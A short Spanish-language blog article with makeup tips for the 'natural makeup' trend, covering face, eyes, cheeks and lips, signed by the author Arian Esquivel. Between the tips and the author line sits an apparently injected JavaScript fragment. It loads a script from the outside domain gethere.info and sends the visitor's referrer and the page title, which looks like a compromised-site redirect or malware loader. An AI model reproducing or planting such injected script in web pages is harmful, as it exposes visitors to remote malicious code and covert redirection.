Domina la tendencia del ‘natural makeup’ con estos trucos

Con estos trucos podrás obtener un maquillaje súper natural y adoptar esta tendencia de las celebs.

Uno de los beauty trends que hemos visto tanto en el street style como en las grandes alfombras rojas es un maquillaje muy discreto, fresco y natural y sobre todo que lo puedes usar a cualquier hora del día.

Esta tendencia ha esta muy fuerte entre las celebridades que lucen un maquillaje natural y sencillo pero muy sofisticado.

Rostro

Lo primero que tienes que hacer es cubrir las imperfecciones con una ligera capa de base y después aplicar un poco de corrector en las zonas que quieras disimular como las ojeras. Busca que ambos productos sean lo más cercano a tu tono de piel.

Ojos

Aplica sombra nude en tus párpados móviles, usa un color medio, en los pliegues de tus ojos para definirlos más y coloca un poco de iluminador en los lagrimales y debajo de tus cejas.

Para hacerlos más naturales solo aplica una ligera capa de rímel sobre tus pestañas y olvídate del delineador.

Mejillas

Opta por un blush de tono rosado o durazno. La técnica ideal es aplicar el rubor suavemente con una brocha en diagonal desde la sien hasta las mejillas. Puedes aplicar un poco de iluminador para dar un poco de luz a tus pómulos y sobre la punta de la nariz.

Labios

Las mejores opciones son los tonos nude o rosa pálido. Si quieres darle más brillo, aplica un poco de gloss en ellos.

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.